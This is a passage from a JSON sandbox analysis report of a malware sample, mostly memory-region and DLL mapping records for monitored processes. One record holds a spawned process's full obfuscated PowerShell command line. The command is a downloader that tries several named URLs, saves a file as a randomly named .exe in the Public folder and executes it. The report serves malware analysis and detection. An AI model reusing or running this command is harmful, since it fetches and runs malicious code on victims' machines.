"ref_process_dump": null, "size": 823296, "start_va": 8791752572928, "type": "region", "version": 1 }, "end_va": 8791753396223, "entry_point": 8791753074804, "filename": "\\Windows\\System32\\usp10.dll", "id": "region_817", "name": "usp10.dll", "norm_filename": "c:\\windows\\system32\\usp10.dll", "region_type": "memory_mapped_file", "start_va": 8791752572928, "timestamp": "00:00:19.804", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 421888, "start_va": 8791767842816, "type": "region", "version": 1 }, "end_va": 8791768264703, "entry_point": 8791767887932, "filename": "\\Windows\\System32\\gdi32.dll", "id": "region_818", "name": "gdi32.dll", "norm_filename": "c:\\windows\\system32\\gdi32.dll", "region_type": "memory_mapped_file", "start_va": 8791767842816, "timestamp": "00:00:19.804", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 651264, "start_va": 8791780753408, "type": "region", "version": 1 }, "end_va": 8791781404671, "entry_point": 8791780763040, "filename": "\\Windows\\System32\\msvcrt.dll", "id": "region_819", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\system32\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 8791780753408, "timestamp": "00:00:19.805", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 28672, "start_va": 786432, "type": "region", "version": 1 }, "end_va": 815103, "entry_point": 0, "filename": null, "id": "region_820", "name": "pagefile_0x00000000000c0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 786432, "timestamp": "00:00:19.813", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 851968, "type": "region", "version": 1 }, "end_va": 860159, "entry_point": 0, "filename": null, "id": "region_821", "name": "pagefile_0x00000000000d0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 851968, "timestamp": "00:00:19.813", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000822-addr_0x00000000000e0000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_32", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 917504, "type": "region", "version": 1 }, "end_va": 921599, "entry_point": 0, "filename": null, "id": "region_822", "name": "private_0x00000000000e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 917504, "timestamp": "00:00:19.814", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000823-addr_0x00000000000f0000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_33", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 983040, "type": "region", "version": 1 }, "end_va": 987135, "entry_point": 0, "filename": null, "id": "region_823", "name": "private_0x00000000000f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 983040, "timestamp": "00:00:19.814", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000824-addr_0x0000000000370000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_34", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 3604480, "type": "region", "version": 1 }, "end_va": 4653055, "entry_point": 0, "filename": null, "id": "region_824", "name": "private_0x0000000000370000", "norm_filename": null, "region_type": "private_memory", "start_va": 3604480, "timestamp": "00:00:19.814", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000825-addr_0x0000000000520000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_35", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 5373952, "type": "region", "version": 1 }, "end_va": 5439487, "entry_point": 0, "filename": null, "id": "region_825", "name": "private_0x0000000000520000", "norm_filename": null, "region_type": "private_memory", "start_va": 5373952, "timestamp": "00:00:19.815", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1605632, "start_va": 5439488, "type": "region", "version": 1 }, "end_va": 7045119, "entry_point": 0, "filename": null, "id": "region_826", "name": "pagefile_0x0000000000530000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 5439488, "timestamp": "00:00:19.815", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1576960, "start_va": 7077888, "type": "region", "version": 1 }, "end_va": 8654847, "entry_point": 0, "filename": null, "id": "region_827", "name": "pagefile_0x00000000006c0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 7077888, "timestamp": "00:00:19.815", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 20971520, "start_va": 8716288, "type": "region", "version": 1 }, "end_va": 29687807, "entry_point": 0, "filename": null, "id": "region_828", "name": "pagefile_0x0000000000850000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 8716288, "timestamp": "00:00:19.815", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 3420160, "start_va": 29687808, "type": "region", "version": 1 }, "end_va": 33107967, "entry_point": 0, "filename": null, "id": "region_829", "name": "pagefile_0x0000000001c50000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 29687808, "timestamp": "00:00:19.815", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 188416, "start_va": 8791767646208, "type": "region", "version": 1 }, "end_va": 8791767834623, "entry_point": 8791767650320, "filename": "\\Windows\\System32\\imm32.dll", "id": "region_830", "name": "imm32.dll", "norm_filename": "c:\\windows\\system32\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 8791767646208, "timestamp": "00:00:19.815", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1085440, "start_va": 8791777017856, "type": "region", "version": 1 }, "end_va": 8791778103295, "entry_point": 8791777022052, "filename": "\\Windows\\System32\\msctf.dll", "id": "region_831", "name": "msctf.dll", "norm_filename": "c:\\windows\\system32\\msctf.dll", "region_type": "memory_mapped_file", "start_va": 8791777017856, "timestamp": "00:00:19.816", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 33161216, "type": "region", "version": 1 }, "end_va": 36106239, "entry_point": 33161216, "filename": "\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": "region_832", "name": "sortdefault.nls", "norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": "memory_mapped_file", "start_va": 33161216, "timestamp": "00:00:19.855", "type": "region", "version": 1 } ], "terminate_reason": "terminated", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "powershell \".( $VeRbOsePReFEREncE.tOstRinG()[1,3]+'x'-jOin'') ( ('. ( ctVpshoME[4]+ctVPsHomE[34]+VnLXVnL) ( ((VnL((uxpeAbfruxp+uxpanuxp+uxpc =uxp+uxp '+'uxp+uxpnew-obVnL+VnL'+'uxp+uxp'+'jectu'+'xp+uxp Suxp+uxpysuxp+VnL+Vn'+'L'+'uxptem'+'.Netu'+'xp+uxp.Webuxp+uxpCuxp+uxplienuxp+uxpt;VnL+VnLeAbnuxp+u'+'xpsuxp'+'+uxpVnL+VnLadauxVnL+VnLp+uVnL+VnLxps'+'d =uxp+uxpVnL+VnL nuxp+'+'uxpeuxp+uxpw-objec'+'t VnL+VnLrandom;eAbbcd ='+' YMjuxpVnL+VnL+uxphttp://www.indpts.com/UVnL+VnLH'+'SD/,httpuxp+uxp://uxp+uxpwwwuxp+uxp.fingerfuxp+uxVnL+Vn'+'Lpun.co.uxp+uxpuk/npZVn'+'L+Vn'+'LdQQy/uxp+uxp,uxpVnL+VnL+uxphttp://www.r'+'uxp+uxpelicstone.uxp+uxpcouxp+uxpm/wuxpVnL+VnL+uxp'+'p-content/themes-suVnL+VnLspeVnL+V'+'nLcted/umuxp+uxpo'+'juxp+uxpp43uxp+uxp/uNssVnL+Vn'+'Luxp+uxpuwuxp+uxpHS/,http://www.wang'+'lb.topux'+'p+uxp/wp-conteuxp+'+'uxpnt/Td/,h'+'ttuxp+uxppuxp+uxp:uxp'+'+uxp//uxp+uxpwux'+'p+uxpww.uxp+uxpfr'+'iuxp+uxVnL+Vn'+'Lpgolitfabrikuxp+uxpen.VnL+VnLse/uxp+uxpzVnL+VnLpuxp+uxpy/YMj.Spuxp+uxplituxp+uxp(YMjVnL+VnL,Yuxp+uxpMj)uxp+VnL+VnLuxp;eAbk'+'VnL+VnLauxp+uxprapas =uxp+uxp u'+'xp+uxpeAVnL+VnLbuxp+uxpnsauxp+uxpdasd.nextuxp+uxp(1, 343245);eAuxp+uxpbhuxp+uxpua'+'s = uxp+uxpeAuxp'+'+uxpbVnL+VnLuxp+uxpenv:public + YMjuxp+uxpGW9YMu'+'xp+'+'uxpj +uVn'+'L+VnLxp+uxp eAbkarapuxp+uxpas + YMj.euxp+uxpxeYMj;uxp+uxpforeach(eAbabc in eAbbcuxVnL+VnLp+uxpd){tuxp+uxpr'+'yuxp+uxp{eAuxp+uxpbfruxp+uxpaVnL+'+'VnLnc.Downlo'+'adFile(e'+'uxp+uxpAbVnL+VnLabc.Tuxp+uxpoVnL+VnLuxp+uxpSuxp+uxptuxp+uxpring(uxp+VnL+VnLuxp),uxp+uxp euxpV'+'nL+VnL+uxpAbhuas);uxp+uxpInuxp+uxpvoke-ItemuxVnL+VnLp+uxp(eAbhVnL+VnLuas)uxp+uxp'+';break'+'VnL+VnL;}catch{write-host uxp+uxpeuxp+uxpAb_.Euxp+uxpxceptionuxVnL+V'+'nLp+uxpVnL+VnL.Messuxp+uxpag'+'e;}}VnL+VnLuxp)-REplaCE uxpGW9'+'uxp,[cHa'+'r]92-CREpLaCE ([c'+'Har]8'+'9+[cHar]77+[cHar]106),[cHar]39-CREpLaCE([cHVnL+VnLar]101+[cHar]6'+'5+[cHar]VnL+Vn'+'L98),[cHar]36) z3L .( 79JEnv:PubLic[13]+VnL+VnL79Jenv:PubLIC[5]+uxpXuxp)VnL) -rePlAce'+' VnLz3LVnL,[cHAR]124-rePlAce VnLuxpVnL,[cHAR]39 -cREpLaCe([c'+'HAR]55+[cHAR]57+[cHAR]74),[cHAR]36) ) ').repLacE('ctV','$').repLacE('VnL',[String][char]39) ) ", "filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe", "id": "proc_3", "image_name": "powershell.exe", "monitor_reason": "child_process", "monitored_id": 3, "origin_monitor_id": 2, "ref_parent_process": { "ref_id": "proc_2", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": "process_00000003-region_00000833-addr_0x0000000000010000-size_0x0000000000020000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_36", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 131072, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_833", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:00:19.862", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 212991, "entry_point": 0, "filename": null, "id": "region_834", "name": "pagefile_0x0000000000030000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 196608, "timestamp": "00:00:19.862", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 262144, "type": "region", "version": 1 }, "end_va": 266239, "entry_point": 0, "filename": null, "id": "region_835", "name": "pagefile_0x0000000000040000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 262144, "timestamp": "00:00:19.862", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000836-addr_0x0000000000050000-size_0x0000000000080000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_37", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 327680, "type": "region", "version": 1 }, "end_va": 851967, "entry_point": 0, "filename": null, "id": "region_836", "name": "private_0x0000000000050000", "norm_filename": null, "region_type": "private_memory", "start_va": 327680, "timestamp": "00:00:19.862", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1740800, "start_va": 1997078528, "type": "region", "version": 1 }, "end_va": 1998819327, "entry_point": 1997078528, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_837", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 1997078528, "timestamp": "00:00:19.862", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16777216, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_838", "name": "private_0x000000007efe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130575360, "timestamp": "00:00:19.863", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000839-addr_0x000000007ffe0000-size_0x0000000000010000-perm_r.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable" ], "ref_process_dump": { "ref_id": "proc_dump_38", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 2147352576, "type": "region", "version": 1 }, "end_va": 2147418111, "entry_point": 0, "filename": null, "id": "region_839", "name": "private_0x000000007ffe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147352576, "timestamp": "00:00:19.863", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 487424, "start_va": 5359927296, "type": "region", "version": 1 }, "end_va": 5360414719, "entry_point": 5359927296, "filename": "\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "id": "region_840", "name": "powershell.exe", "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe", "region_type": "memory_mapped_file", "start_va": 5359927296, "timestamp": "00:00:19.863", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 8791785144320, "type": "region", "version": 1 }, "end_va": 8791785148415, "entry_point": 8791785144320, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_841", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 8791785144320, "timestamp": "00:00:19.872", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 8796092694528, "type": "region", "version": 1 }, "end_va": 8796092837887, "entry_point": 0, "filename": null, "id": "region_842", "name": "pagefile_0x000007fffffb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 8796092694528, "timestamp": "00:00:19.874", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000843-addr_0x000007fffffd4000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_39", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 8796092841984, "type": "region", "version": 1 }, "end_va": 8796092846079, "entry_point": 0, "filename": null, "id": "region_843", "name": "private_0x000007fffffd4000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092841984, "timestamp": "00:00:19.874", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000844-addr_0x000007fffffde000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_40", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092882944, "type": "region", "version": 1 }, "end_va": 8796092891135, "entry_point": 0, "filename": null, "id": "region_844", "name": "private_0x000007fffffde000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092882944, "timestamp": "00:00:19.875", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000845-addr_0x0000000000220000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_41", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 2228224, "type": "region", "version": 1 }, "end_va": 3276799, "entry_point": 0, "filename": null, "id": "region_845", "name": "private_0x0000000000220000", "norm_filename": null, "region_type": "private_memory", "start_va": 2228224, "timestamp": "00:00:19.881", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1175552, "start_va": 1995898880, "type": "region", "version": 1 }, "end_va": 1997074431, "entry_point": 1995988640, "filename": "\\Windows\\System32\\kernel32.dll", "id": "region_846", "name": "kernel32.dll", "norm_filename": "c:\\windows\\system32\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 1995898880, "timestamp": "00:00:19.881", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 438272, "start_va": 8791751000064, "type": "region", "version": 1 }, "end_va": 8791751438335, "entry_point": 8791751012576, "filename": "\\Windows\\System32\\KernelBase.dll", "id": "region_847", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\system32\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 8791751000064, "timestamp": "00:00:19.882", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_848", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:00:19.895", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_849", "name": "pagefile_0x0000000000020000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 131072, "timestamp": "00:00:19.895", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 851968, "type": "region", "version": 1 }, "end_va": 1273855, "entry_point": 851968, "filename": "\\Windows\\System32\\locale.nls", "id": "region_850", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 851968, "timestamp": "00:00:19.895", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000851-addr_0x0000000000320000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_42", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 3276800, "type": "region", "version": 1 }, "end_va": 4325375, "entry_point": 0, "filename": null, "id": "region_851", "name": "private_0x0000000000320000", "norm_filename": null, "region_type": "private_memory", "start_va": 3276800, "timestamp": "00:00:19.896", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000852-addr_0x0000000000450000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_43", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 4521984, "type": "region", "version": 1 }, "end_va": 4587519, "entry_point": 0, "filename": null, "id": "region_852", "name": "private_0x0000000000450000", "norm_filename": null, "region_type": "private_memory", "start_va": 4521984, "timestamp": "00:00:19.897", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1024000, "start_va": 1994850304, "type": "region", "version": 1 }, "end_va": 1995874303, "entry_point": 1994957512, "filename": "\\Windows\\System32\\user32.dll", "id": "region_853", "name": "user32.dll", "norm_filename": "c:\\windows\\system32\\user32.dll", "region_type": "memory_mapped_file", "start_va": 1994850304, "timestamp": "00:00:19.897", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2131623935, "entry_point": 0, "filename": null, "id": "region_854", "name": "pagefile_0x000000007efe0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130575360, "timestamp": "00:00:19.897", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 15728640, "start_va": 2131623936, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_855", "name": "private_0x000000007f0e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2131623936, "timestamp": "00:00:19.898", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 454656, "start_va": 8791547445248, "type": "region", "version": 1 }, "end_va": 8791547899903, "entry_point": 8791547449652, "filename": "\\Windows\\System32\\mscoree.dll", "id": "region_856", "name": "mscoree.dll", "norm_filename": "c:\\windows\\system32\\mscoree.dll", "region_type": "memory_mapped_file", "start_va": 8791547445248, "timestamp": "00:00:19.898", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 8791711023104, "type": "region", "version": 1 }, "end_va": 8791711125503, "entry_point": 8791711023104, "filename": "\\Windows\\System32\\atl.dll", "id": "region_857", "name": "atl.dll", "norm_filename": "c:\\windows\\system32\\atl.dll", "region_type": "memory_mapped_file", "start_va": 8791711023104, "timestamp": "00:00:19.900", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 897024, "start_va": 8791751589888, "type": "region", "version": 1 }, "end_va": 8791752486911, "entry_point": 8791751722848, "filename": "\\Windows\\System32\\advapi32.dll", "id": "region_858", "name": "advapi32.dll", "norm_filename": "c:\\windows\\system32\\advapi32.dll", "region_type": "memory_mapped_file", "start_va": 8791751589888, "timestamp": "00:00:19.911", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 57344, "start_va": 8791752507392, "type": "region", "version": 1 }, "end_va": 8791752564735, "entry_point": 8791752511616, "filename": "\\Windows\\System32\\lpk.dll", "id": "region_859", "name": "lpk.dll", "norm_filename": "c:\\windows\\system32\\lpk.dll", "region_type": "memory_mapped_file", "start_va": 8791752507392, "timestamp": "00:00:19.912", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 823296, "start_va": 8791752572928, "type": "region", "version": 1 }, "end_va": 8791753396223, "entry_point": 8791753074804, "filename": "\\Windows\\System32\\usp10.dll", "id": "region_860", "name": "usp10.dll", "norm_filename": "c:\\windows\\system32\\usp10.dll", "region_type": "memory_mapped_file", "start_va": 8791752572928, "timestamp": "00:00:19.912", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 421888, "start_va": 8791767842816, "type": "region", "version": 1 }, "end_va": 8791768264703, "entry_point": 8791767887932, "filename": "\\Windows\\System32\\gdi32.dll", "id": "region_861", "name": "gdi32.dll", "norm_filename": "c:\\windows\\system32\\gdi32.dll", "region_type": "memory_mapped_file", "start_va": 8791767842816, "timestamp": "00:00:19.913", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 2109440, "start_va": 8791772954624, "type": "region", "version": 1 }, "end_va": 8791775064063, "entry_point": 8791773098800, "filename": "\\Windows\\System32\\ole32.dll", "id": "region_862", "name": "ole32.dll", "norm_filename": "c:\\windows\\system32\\ole32.dll", "region_type": "memory_mapped_file", "start_va": 8791772954624, "timestamp": "00:00:19.913", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 462848, "start_va": 8791778656256, "type": "region", "version": 1 }, "end_va": 8791779119103, "entry_point": 8791778729504, "filename": "\\Windows\\System32\\shlwapi.dll", "id": "region_863", "name": "shlwapi.dll", "norm_filename": "c:\\windows\\system32\\shlwapi.dll", "region_type": "memory_mapped_file", "start_va": 8791778656256, "timestamp": "00:00:19.914", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 651264, "start_va": 8791780753408, "type": "region", "version": 1 }, "end_va": 8791781404671, "entry_point": 8791780763040, "filename": "\\Windows\\System32\\msvcrt.dll", "id": "region_864", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\system32\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 8791780753408, "timestamp": "00:00:19.914", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 126976, "start_va": 8791781408768, "type": "region", "version": 1 }, "end_va": 8791781535743, "entry_point": 8791781433576, "filename": "\\Windows\\System32\\sechost.dll", "id": "region_865", "name": "sechost.dll", "norm_filename": "c:\\windows\\system32\\sechost.dll", "region_type": "memory_mapped_file", "start_va": 8791781408768, "timestamp": "00:00:19.915", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1232896, "start_va": 8791781867520, "type": "region", "version": 1 }, "end_va": 8791783100415, "entry_point": 8791782190416, "filename": "\\Windows\\System32\\rpcrt4.dll", "id": "region_866", "name": "rpcrt4.dll", "norm_filename": 